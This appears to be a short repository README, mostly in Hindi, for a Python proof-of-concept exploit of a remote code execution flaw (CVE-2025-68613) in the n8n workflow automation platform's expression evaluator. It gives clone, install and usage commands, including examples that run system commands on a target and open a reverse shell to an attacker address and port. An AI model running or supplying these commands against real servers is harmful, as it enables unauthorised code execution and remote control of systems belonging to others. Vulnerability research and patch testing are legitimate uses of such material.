
Python Exploit for CVE-2025-68613.
n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म में एक गंभीर दूरस्थ कोड निष्पादन (Remote Code Execution) भेद्यता के लिए प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC) शोषण।
यह भेद्यता n8n एक्सप्रेशन मूल्यांकन प्रणाली में मौजूद है। उपयोगकर्ता द्वारा प्रदान किए गए एक्सप्रेशन ठीक से सैंडबॉक्स नहीं किए जाते हैं, जिससे प्रमाणित हमलावर होस्ट सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।
CVE आईडी: CVE-2025-68613
भेद्यता प्रकार: Remote Code Execution (RCE)
घटक: Expression Evaluator
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : लक्ष्य URL (जैसे, http://localhost:5678)-u, --username : n8n खाता ईमेल पता-p, --password : n8n खाता पासवर्ड-c, --cmd : निष्पादित करने के लिए सिस्टम कमांड--reverse-shell : रिवर्स शेल ट्रिगर करें (प्रारूप: IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444